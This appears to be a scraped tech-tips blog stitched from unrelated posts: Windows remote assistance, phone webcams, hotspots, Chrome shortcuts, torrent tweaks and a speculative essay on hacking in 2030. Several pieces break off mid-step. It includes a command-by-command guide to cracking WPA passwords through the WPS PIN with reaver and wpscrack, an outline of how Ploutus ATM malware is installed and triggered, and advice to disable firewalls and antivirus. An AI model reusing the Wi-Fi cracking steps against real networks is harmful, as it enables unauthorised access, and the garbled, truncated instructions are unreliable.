Remote sharing is nowadays on its peak, people use remote sharing to provide live support or for sharing screens. Most of us always use third party software's for sharing or controlling remote systems using software's like Teamviewer or Radmin etc. Today i am going to teach you guys how to connect any two or as many as windows PC through remote without using any third party

tool like team viewer etc. So lets learn how to share‎ screens without any third party tool.As we all knows‎ Windows OS is full of hidden programs that are only limited to developer or geeks. Today we are going to learn about MSRA (windows remote assistance) executable.‎ MSRA is windows inbuilt remote assistance program‎ using which you can control remote pc's, share remote screens, provide remote support and much more. Lets learn how to use MSRA for remote sharing.

Steps to Share or Control Remote PC using MSRA:

1. First of all click on startup and type command "MSRA"

2. Now you will see screen having title

"Windows Remote Assistance" , there are two options

displayed:

Invite someone you trust to help you : Choose this

option if you want to share your screen with

someone.

Help someone who invited you : Choose this

option if you want to control someone others PC

remotely.

Click on Option a "Invite someone you trust to help you" to

share your screen:

Once you click the above option

Now you can see three different options :

Send this invitation as file : On clicking this option

you can save the invitation file and send it to

anyone from which you require help. After saving

the file another window will open containing the

password. You have to provide that password to

person whom you want to connect to your

machine.

Use email to send an invitation: You can send

invitation directly via email but it requires email

client on your machine to send email like outlook

etc.

Use Easy connect: Another method to directly

connect two PC is using Easy connect but this

require some basic settings at your routers end

i.e. If the computer has IPv6 disabled or is behind

a NAT router that blocks Teredo traffic, the Easy

Connect option will be unavailable.

Now once you have send the remote assistance invitation

file to user, he can connect to your PC by double clicking

the invitation file and then entering the password.

Note: You need to enable remote assistance service.

3. Help someone who invited you : By clicking this option

you can provide help to anyone who has done the above

task. You will need two things : Invitation file and

password to connect remote PC.

Woohooo… Did you know there is another smart option by

which you can directly connect to any PC using IP

address? If not, well lets learn that too. Yup we can also

provide windows remote assistance support using IP

address too. Here are options.

1. First of all click on startup and type command "MSRA"

and press enter.

2. Now you will see screen where two options are

displayed, Select "Help someone who invited you".

3. After that you will see some option, click on the bottom

one "Advanced connection option for help desk" as shown

below :

address:

Enter IP address or computer name

After entering IP address press Next to connect to IP

address. That's all.

How to use your Smartphone as a web cam

I joined a Facebook group that gives updates on tech stuffs and I saw this, I didn't write this! This is a typical copy and paste. So here we go:

Many would doubt the concept as of why one would prefer using his phone as a webcam? Well, there are a bunch of reasons to push this idea‎:

‎• Old phone having no front cam? You could use rear

camera for video calling instead of buying one.

• A good chance that it can stand for a pretty good

"Security camera", monitoring your babies or other watch hours, without buying expensive standalone cameras!

Oh yes, it is a matter of concern that you would buy a new‎ camera for the purpose but still if you want to save those few dollars/rupees, you can stick to this idea. Don't sell that old one in your pocket, it can still serve you well.

Now the question arise on How-to-do stuff? Isn't it? Well there are certain right apps that would provide you with satisfying interface and make worth it.

Android:

Play store as well as private developers provide a number

of apps for this purpose. But beware of those fake tagline,

you could be fooled and end up in wasting worthy data or leak of some personal information. Out of the most tested, IP Webcam is the best one which

proves for this purpose. Unlike DroidCam (which require a similar application to be installed in windows), this app‎ works through your browser, giving you the compatibility and freedom to move over platforms.

Step-to-do:

1. Connect you phone and computer to the same Wi-

Fi network.

2. Install the app IP Webcam on your phone.

3. It is advisable to close any app which uses your

phone's camera (kill'em using task manager).

4. Launch the app. Scroll down until a tab appears-

"Start server".

5. The app will now display a URL, something like-

http://abc.de.fg.ij:klmn (alphabets represents

numerical).

6. Enter this URL in your web browser and hit Enter.

7. In the browser, you'll see a drop down menu next

to Video renderer. Select Browser.

8. Next, you'll see Audio renderer. Select HTML wav.

Now you're good to go. You'll see a live video feed in your browser. You can record it via browser. You'll get used to controls once you use it.

Although there might be some problem in HTML wav audio‎ streaming, you can prefer VLC media player for this purpose.

Download it from here (www.videolan.org/vlc/download-windows.html ) , install it. Go to Media>Network Stream and enter the URL generated from the app.

Once the app is running, you don't need to keep the

phone's screen on. It works smoothly even if phone is

locked but video feed experience is slightly better when phone's screen is on.

iOS:

EpocCam and PocketCam rule the app market in race of making your iProduct a better webcam. PocketCam is messy to configure, and gives access to only black n white video, no audio in free version. You can rely on the paid one to get better service.

EpocCam is free and quite easy to set up too! Here's how to make it under use:

1. Download EpocCam on your iDevice as well as for

your Mac or PC.

2. Make sure both the devices are connected on the

same network.

3. While installing, several prompt may appear

asking you to install some drivers. Install them,

they essential audio and video drivers used by the

app.

4. Start the app on both devices.

5. The app will automatically searches for the device

running EpocCam on the same Wi-Fi network.

Soon, the video from your iDevice will be shown

up on your computer.

6. There might be a few occasions when the app

won't connect your device to your computer. In the

case, restarting the app quickly fixes the issue.

Also, there is no video recording feature in this

app, but video recording apps like CamStudio,

ScreenPresso, etc. will work for you.

Video Calling- Setting up your phone as a

Webcam:

Android:

Disappointing though, IP Webcam doesn't work with

Skype, so you need to stick with DroidCam and its PC

Client to work.

Step-to-do:

1. Install DroidCam on your phone, as well as on

your computer. (As DroidCam Client, here )

2. Connect both the devices to the same network.

3. Open the app on the phone and write down the Wi-

Fi IP listed on the main screen.

4. Open the Windows client and paste the IP on your

computer.

5. If you have slow internet connection, select low

from the video quality drop down menu.

6. Click Start.

7. Now you'll see video feed from your phone on the

DroidCam Windows application.

8. Better to keep your phone unlocked, to avoid

minimal stutter and lag. Keep android app open

and turn off auto-lock.

9. Restart Skype (if it is already opened) and select

DroidCamSource1 as webcam.

Good to go again. Use your phone as the webcam.

iOS:

The procedure is simple. EpocCam enables you to connect to Skype and use your iDevice as Webcam .

Steps-to-do:

1. Install app on both devices, as mentioned earlier.

2. Start the app, it will connect automatically.

3. Now, restart Skype and select EpocCam as the

webcam.

4. Now you'll be using your iDevice as Webcam.

How to set default camera on Skype:

Skype on your PC will require the camera configuration.

Steps-to-do:

1. Download and Install desktop version Skype app.

2. Sign in to your account and enter Tools>Options.

3. Click video setting under the general tab.

4. Select the correct camera from the drop down

menu next to Select webcam. The name of the

camera will be similar to the name of the app

5. you are using. Select it.

6. Click save.

You can now place video calls from your computer using

your phone as a webcam!

Note for iPhone, iPad users: The app stops working if you

hit the home button or lock your phone.

Windows XP flaw: ATMs Being Hacked By Just An Sms

‎We already know that Microsoft's support for windows XP

has been ended on 8th April of this year , apparently 95%

of the world's 3 million ATM machines are runnnig on it.

Microsoft's decision to withdraw support for Windows XP

poses critical security threat to the economic

infrastructure worldwide.

Security researchers at Antivirus firm Symantec claimed

that hackers can exploit a weakness in Windows XP

based ATMs, that allow them to withdraw cash simply by

sending an SMS to compromised ATMs.

‎What was interesting about this variant of

Ploutus was that it allowed cybercriminals to

simply send an SMS to the compromised

ATM, then walk up and collect the dispensed

cash. It may seem incredible, but this

technique is being used in a number of places

across the world at this time. researchers

said.‎

‎According to researchers – In 2013, they detected a

malware named Backdoor. Ploutus, installed on ATMs in

Mexico, which is designed to rob a certain type of

standalone ATM with just the text messages.

To install the malware into ATMs machines, hacker must

connect the ATM to a mobile phone via USB tethering and

then to initiate a shared Internet connection, which then

can be used to send specific SMS commands to the phone

attached or hardwired inside the ATM.

Since the phone is connected to the ATM

through the USB port, the phone also draws

power from the connection, which charges the

phone battery. As a result, the phone will

remain powered up indefinitely.

How can this be achieved?

Connect a mobile phone to the machine with a USB cable and install Ploutus Malware.

The attacker sends two SMS messages to the mobile phone inside the ATM‎ SMS 1 contains a valid activation ID to activate the malware. SMS 2 contains a valid dispense command to get the money out.
Mobile attached inside the ATM detects valid‎ incoming SMS messages and forwards them to the ATM as a TCP or UDP packet.
Network packet monitor (NPM) module coded in the malware receives the TCP/UDP packet and if it contains a valid command, it will execute Ploutus‎ Amount for Cash withdrawal is pre-configured‎ inside the malware.
Finally, the hacker can collect cash from the‎ hacked ATM machine.

Researchers have detected few more advanced variants of this malware, some attempts to steal customer card and PIN data, while others attempt man-in-the-middle attacks.
This malware is now spreading to other countries, so you are recommended to pay extra attention and remain cautious while using an ATM.

Am very sorry i've not updated this blog in a long time it was due to some personal reasons.
Now to today's post i'll be writing on how you can make ur PC or Laptop a hotspot for other devices. Follow these simple steps and you will be done in no time at all.

Open cmd as administrator and.copy
paste below lines one by one
1. netsh wlan show drivers

2. netsh wlan set hostednetwork
mode=allow

3. netsh wlan set hostednetwork
ssid=Netwrok name

4. netsh wlan set hostednetwork
key=password here

5. netsh wlan start hostednetwork

DONE!!
N.B. The network name and password can be changed to anything you prefer.

How to Hack WPA WiFi Passwords by Cracking the WPS PIN

A flaw in WPS, or WiFi Protected Setup, known about for over a year by TNS, was finally exploited with proof of concept code. Both TNS, the discoverers of the exploit and Stefan at .braindump have created their respective "reaver" and "wpscrack" programs to exploit the WPS vulnerability. From this exploit, the WPA password can be recovered almost instantly in plain-text once the attack on the access point WPS is initiated, which normally takes 2-10 hours (depending on which program you use). This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN,
the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA.
In thisNull Byte, let's go over how to use both tools to crack WPS. As of yet, no router is safe from this
attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.

REQUIREMENTS:

The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev

TOOLS:

Reaver (support for all routers

wpscrack (faster, but only support for major router brands)

Crack WPS:

Text in bold is a terminal command. Follow the guide that corresponds to the tool that you chose to use below.

REAVER:

1. Unzip Reaver. unzip reaver-1.3.tar.gz
2. Change to the Reaver directory. cd reaver-1.3
3. Configure, compile and install the application.
./configure && make && sudo make install
4. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX). sudo iwlist scan wlan0
5. Set your device into monitor mode. sudo airmon-ng start wlan0
6. Run the tool against an access point. reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
7. Wait until it finishes. This tool makes it too easy.

Wpscrack.py

1. Make the program an executable. chmod +x wpscrack.py
2. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX). sudo iwlist scan wlan0
3. Get your MAC address, save it for later. ip link show wlan0 | awk '/ether/ {print $2}'
4. Set your device into monitor mode. sudo airmon-ng start wlan0
5. Attack your AP. wpscrack.py –iface mon0 –client
<your MAC, because you're attacking yourself, right?> –bssid <AP MAC address> --ssid <name of your AP> -v
6. Await victory. Now, let's hope we see a lot of
firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.

Ctrl + Shift + Del takes you directly to the settings page where you can delete your browsing history.

Ctrl + 9 takes you to the last tab open on your current window.
Ctrl + Shift + B toggles the bookmarks bar on and off.

If the text you copied is a web page, open a new tab and right click on the address bar to get “Paste and Go”, saves you one keystroke / mouse click each time !
To zoom in or zoom out on a page (to increase font size etc) hold the control key and scroll using mouse. Scrolling forward zooms in, while scrolling backward zooms out. Ctrl + 0 brings the page back to the default zoom level.
Any text area ( like a comment form on a blog ) if you need more space, click and drag on the bottom-right corner to re-size the box to your choice. (Note: Website owners can disable this feature with some coding. If the website has disabled this feature, you will not be able to re-size the field.
After downloading a file, you can copy it to the desktop or to any other folder by just dragging them directly from Google Chrome’s downloads bar ( yes, that small bar at the bottom of the page with download progress, when you are downloading a file ) You can drag a file from this downloads bar to upload files as well. For example, you downloaded a photo your friend sent to you via email. While it is still showing on your downloads bar, open Google Drive or Dropbox (or any website that supports drag and drop to upload). Drag the file from the downloads bar directly in to the upload field to start the upload.
Easily bookmark a page clicking the “star” icon on the right end of the addressbar. You can do this with the keyboard shortcut “Ctrl + D” too.
Use it as a calculator for basic calculation. Try typing 4*10 now!
Open chrome://plugins to manage Chrome plugins. Note: These are not extensions. You will see the inbuilt PDF viewer, Native client and Flash etc here.
Open chrome://flags to explore experimental features. These are the features that Google is getting ready for future versions of Chrome. To test these out, you can click Enable next to the experiment and restart Chrome.

Drag Text To Omnibox To Search (Try this now! select some text on this page, and drag it to the omnibox, to open Google search on the current tab.
Drag Text To Tab Bar To Search In New Tab: Drag it to the omnibar, that is the area above the addressbar next to the mew tab button, to open search in a new tab.
Drag Links To omnibox to open them in the current tab.
Drag Links to Tab Bar To Open In New Tab
Drag and drop files from your computer to Chrome addressbar to open with Chrome. This works with PDF files, images and html files.

Hold Shift while you refresh, for more refresh options.
On the Javascript console, click the { } icon to view minified javacript with better formatting (unminify)
You can do an audit of the code to see things like unused CSS rules. From the developer tools panel, open the Audits tab. Make sure that Audit Present State is selected, and hit Run

Right click any tab and select Pin tab to “save” it. Save? Yes, Chrome will remember the tabs you pinned and open them next time you open Chrome. Chrome will arrange pinned tabs to the extreme left of your Chrome windows.
Another use for Pinned Tab: You already know about pinned tab on Chrome. I use it for two more things. When I pin a tab, the close button goes off, and I will not accidentally close it.
Ctrl + Shift + D – Saves all open pages as bookmarks in a new folder.
Right click any tab for additional options like – Close tab to the right, and close all other tabs etc.
Right click and select Duplicate tab to create a new tab with same webpage.
Fake your location on Chrome.
Reduce volume of Chrome (not your entire computer)
Visit chrome://extensions and click on ‘view permissions’ on any extension to view permissions allowed to the extension.
To view Google cache of any webpage, try cache:website.com. For example, cache:chromestory.com to view cache of chromestory.com, straight from your Chrome omnibar (addressbar)
To clear an item from your Downloads page, right-click an entry and select Remove.
Press Alt and click a link. – Downloads the target of the link.
Right click on any extension’s icon to hide it or disable it ! ( hide = extension is running but no icon is visible.)
On Windows 8, select Relaunch Chrome in Windows 8 Mode to open Chrome in Metro Mode.
Select View Background Pages from the settings menu to see the background processes (task manager opens with these background processes selected)
If you have set up Chrome to ask you where to save downloaded file, Chrome will start the download in the background while you are deciding which folder to put that file in. You can take a break, and come back later to select a folder!

This whole process can be shortened by creating
shortcuts on the Desktop which will shut down
Windows at the click of a button.

1.Shutdown
Start by creating a new shortcut( right click and
select New> Shortcut). Then in the command line
box, type *without quotes.*

This Shortcut on clicking, will Shutdown Windows immediately without any Warning.

2.Restart
To create a Shortcut to Restarting Windows, type

Enter on your keyboard . Scroll
down and look for the following entries:

network.http.proxy.pipelining
network.http.pipelining.maxrequests" *without quotes
Normally mozilla firefox will make one request to a web
page at a time.
When you enable pipelining it will make several at
once, which really
speeds up page loading.

2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some
number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New->
Integer.
Name it "nglayout.initialpaint.delay" and set its value
to "0".
This value is the amount of time the browser waits

So once you’ve got your upload speed, we need to go to another website to get the correct values for the configuration settings in ?Torrent. The website we’ll use is Azureus Upload Settings Calculator. Click here to visit the website. Now you will see something like this:

Now I believe you’ve seen two boxes at the top where you can enter your upload speed, either in kilobit/second or kilobyte/second. Now you know your speed was displayed in Megabits/second so we need to convert it to kilobits/second. To do that, simply multiply your upload speed with 1024. So in my case it would be 0.38*1024=380 kilobits/second. Alternately, you can use a website likeConvertUnits to convert Mbps to Kbps.

Now what you need to do is enter this value, in to the respective field in our Azureus webpage and get the results. So as soon as you fill this upload speed in the website, the remaining columns will be auto-filled with values, values that you’ve to enter in ?Torrent to optimize it. So here is how it’ll look like once you’ve entered the value into the box.

Please know that the values you get on entering your upload speed will be different from mine and you have to use the values which YOU get to proceed to the further steps. So these are the values we will be using to optimize ?Torrent. So make sure you do not close this page since we require these values for the upcoming steps.

Once you’ve got the values, we are proceeding to the next step which is assigning the optimized values to the ?Torrent configuration settings. For that, first open up ?Torrent. Once you’ve done that, Click Options > Preferences.

Once the preferences window has opened, we need to fill up the values. For that click theBandwidth tab on the left pane and fill the values into the respective columns like this:

Unlike other tutorials which promise you 100% speed increase, this is an actual working method which you can try and use on your PC. Now we’ve successfully covered the first part of this tutorial. In the next part, we’ll tinker a bit more and utilize something called ports and learn how it can really help to increase your ?Torrent speed.

Optimizing Ports To Increase Download Speed

Once we’ve configured the upload settings, it’s time to optimize our ports. If you know nothing about ports, a port is a network resource that your torrent client uses to allow other systems in the network to access your PC. All the ports have unique numbers like 3333 or 4545 which are known as TCP port number. So when other systems try to access your PC, they do it through some random ports. Suppose they’re trying to access port number 5435 and if your ports are closed or blocked, they won’t be able to access your PC and stops connections to your PC and thereby decrease your download speed. So you’ll need forwarded ports to have maximum connections to PC in the network and get maximum download speed. So we will be learning how to open ports and enable others to establish a connection to your PC.

First what you need to do is disable any firewalls on your PC. If you have a firewall or Antivirus program installed, it will block incoming connections thereby decreasing your download speed. So you need to disable any firewalls or antivirus programs on your PC. Alternatively, you can add an exception for your ?Torrent client in the firewall too. This will have the same effect.

Now we need to forward a particular port. Now there are no specific instructions on how to forwarda port on your PC. It completely depends on what type and brand of router you’ve got. The settings will completely vary and to overcome this difficulty, we will be using a website namedPortForward.

Once you’ve entered the website, you’ll see two boxes where you can choose your router brand and your router model and then the website will give you specific instructions to forward a port for a particular application on your PC. So specify the brand and model and then choose ?Torrentfrom the list of applications to forward. Now you’ll see specific instructions just for you like this:

Now once you’ve followed all the steps it’s time to check whether you’ve successfully forwarded the port. This ensures you’ve done all the steps right and you’re ready to use the port. For that we will be visiting the website CanYouSeeMe. When you’re in the website, enter the port which you forwarded and click Check Your Port to know whether you’ve done it right. If yes, the website will say you’ve successfully forwarded. Else it will pop up an error in which case you’ve to repeat the steps and rectify it.

This is step by step tutorial that explains how to create python function for exporting data in Excel file.
To start programming in python you need to install python. In my previous article How To Create Your First Python Program I explained how to do it. After installing python you should install pythonpackage “xlwt”. Download xlwt from this LINK to some directory, for example site-packages . OpenCommand Prompt and navigate to site-packages/xlwt directory .

HOW TO INSTALL ANROID MARKET AND RUN ANDROID APPS ON BLACKBERRY PLAYBOOK

It is not a new thing that android apps can be open on blackberry playbook but some people do not know that it is possible. So, today I will be writing on how you can install and run android apps on your playbook.

First of all you need to install the BBH tool (simply go to Google type in “BBH TOOL” and click on the first result)

Go to a website that has good apps for playbook e.g. goodereader.com the apps will be .bar files Save the apps n your pc

On your playbook you go to settings > security > development mode

If it is off turn it on

Enter your password it’s advisable to make the password short and easy to remember.

Hacking in the Year 2030

If you are anything like me, when you hear
"Hacking in the Year 2030" you immediately
visualize hacking robot armies and UFOs to take
them down with lazers and ultrasonic USB
attachments via your PlayStation 10 using only
changes in pupil dilation to read mental instructions
of what hacking tools to launch. Well this
technology may very well be around in 2030, but
unfortunately most of you are more likely to still be
exploiting Cross Site Scripting (XSS) vulnerabilities
in the web interface of the killer robots. So to paint
a picture of what we may be doing, lets get an idea
of the threat landscape in 2030 by having a look at
how things have progressed in recent years. Over
the last 10 years we have seen a series of what I
am calling "Hacking Revolutions", as listed below;
- Infrastructure Hacking Revolution - Web
Application Hacking Revolution - Client-Side
Software Hacking Revolution - Social Networking
Hacking Revolution - The Hacktivism Revolution -
Mobile Hacking Revolution The "Infrastructure
Hacking Revolution" was the first where most
attacks were targeting infrastructure. This was
because coding within operating systems and
services seemed to be lacking a small thing called
security. This forced software vendors (primarily
Microsoft) to realise that security was pretty
important in their long term vision, which led to a
dramatic drop in remotely exploitable infrastructure
related vulnerabiltiies. This drop in exploitable
vulnerabilities then led into the "Web Application
Hacking Revolution". Development was now being
undertaken by inexperienced developers with
restricted timeframes, budgets, and insecure
frameworks, which meant that security was pretty
much out of scope. On the up side, this has kept
most penetration testers in jobs for many years and
will continue to for years to come. Although the
Web Application Hacking Revolution is like that
odor in the car that just won't go away, the "Client-
Side Software Hacking Revolution" forced itself into
the spotlight of hackers. This phase included email
Phishing attacks containing exploit code to trigger
vulnerabilities in web browsers, office programs,
Adobe Flash, Adobe Reader, Java, and so on. This
continues today with the ongoing release of 0-day
exploits. One noteable attack technique known as
"DLL Hijacking" was identified during this period,
which basically revealed a vulnerability that
existed in what seemed to be every piece of client-
side software that existed on the planet and had to
be addressed independently in each piece of
software. The "Social Networking Hacking
Revolution" was then born. This provided attackers
with not only a vast number of access control flaws
to exploit to harvest our private information, but
also a new avenue to bypass Spam and Phishing
filters allowing malware and web-worms to be
propogated more effectively. The Hacktivism
Revolution then began where it seemed that every
day was a bright new day for companies being
breached and corporate data being published on
Pastebin. Hundreds of millions of accounts were
compromised during this era and many executives
were realising that the Fear, Uncertainty and Doubt
(FUD) that their security officers were spreading is
actually an every day occurrance. For a period
during The Hacktivism Revolution, it appeared that
Anonymous was going to be the next superpower
as they forced multi-national corporations to shake
at the knees by simply mentioning them in a two
minute YouTube video. Although things are
relatively quiet after a number of Anonymous
members were arrested, it is only a matter of time
until the fear wears off and Hacktivists continue
their rampage. The "Mobile Hacking Revolution"
came of age where companies were dropped into
an area that they have never been before whilst
sitting in the middle of an environment where
major security breaches and data theft occur
regularly. This shift has forced both developers and
companies into upskilling and investing in security.
Unfortunately access control flaws are rampant and
security breaches occur at a larger scale as more
individuals trust the app developers with their
usernames, passwords and personal data. The most
recent breach gaining access to over 50,000,000
accounts. This Hacking History Lesson reveals one
key concept; As new technologies are developed,
the risk to our systems and data increases, and the
impact of security breaches increases
exponentially. So what will "Hacking in the Year
2030" look like? To start with, the number of
techniques to perform financial theft will only be
limited to hackers' imaginations. Country-based
currencies will be left behind as virtual currencies
gain popularity. Virtual currencies will therefore
become a primary target, and we have seen the
conception of this already where financial scams
are occurring within virtual online-worlds. These
scams are then able to convert their stolen virtual
currencies to real world dollars and cents. This
leads into the loss of control that world
governments will experience as they begin to lose
their enforcement capabilities since country-based
laws are no longer enforcable within virtual online-
worlds. This is because virtual online-worlds are
distributed on systems that are hosted in countries
throughout the world with different cyber-crime
laws - that is if they have any cyber-crime laws.
Combining the excessive amounts of data collected
on each of us, the massively advanced analysis
techniques, and extreme processing power
developed by 2030, artificial intelligence systems
will have the capability to accurately predict what
you will do before you do it. Currently we see
compromised online accounts being sold in
underground markets for use in identity theft and
various other attacks for financial gain. The value
of today's online accounts pale into insignificance
compared to what malicious and profitable exploits
can be implemented, by both criminals and
organisations, if our actions can be determined
before they happen. The future also requires
massive power demands to run the excessive
amount of technology, from our wireless Coke can
coolers through to our driverless cars and transport
systems. Energy suppliers will become even more
critical and therefore even more valuable targets
for hackers. This may range from extortion
attempts by shutting down transport systems
through to industrial espionage to steal secrets of
how to generate energy more efficiently and in a
more cost-effective manner. "Hacking for Physical
Harm" has been used a couple of times in the past,
with one example being an epilepsy website that
was defaced with flashing coloured squares to
trigger epileptic fits. When we eventually lose the
need to talk with our mouths and start ordering our
coffees using direct interfaces to our brains, a
major terrorist threat is introduced where mass
murder can be performed in high-tech drive-bys.
This situation may seem unrealistic, but is actually
already a reality. A security researcher has already
identified a technique where pacemakers can be
hacked from 50-feet away to deliver a deadly shock
to their owner. Luckily for pacemaker owners,
farming of replacement organs will also be a
reality. Unfortunately if the Organ Farm is hacked
and the thermostats in the Growth Centres are
modified, millions of replacement organs become
useless leading to major sections of the population
dropping off. As we have seen through the
Hacking History Lesson earlier, companies will
struggle find the budgets to maintain their security
as technology continues to advance at a rapid pace.
This will lead to companies existing completely in
the cloud and relying on third party companies
protecting their assets. This simply leads to a
central cloud that hackers need to compromise;
however, this means that they have everyone's
data rather than just a single company. If you

1. Click Start then Run and type "gpedit.msc" without quotes.

2. Then go to Local Computer Policy>Computer Configuration>Administrative Templetes>Network>QoS Packet Scheduler. Click on QoS Packet Scheduler. In the right side , find Limit Reservable Bandwidth and double click on Limit Reservable Bandwidth.

3. It will say it is not configured but the truth is under the ‘Explain’ tab. Select ‘Enable’ and set reservable bandwidth to zero.
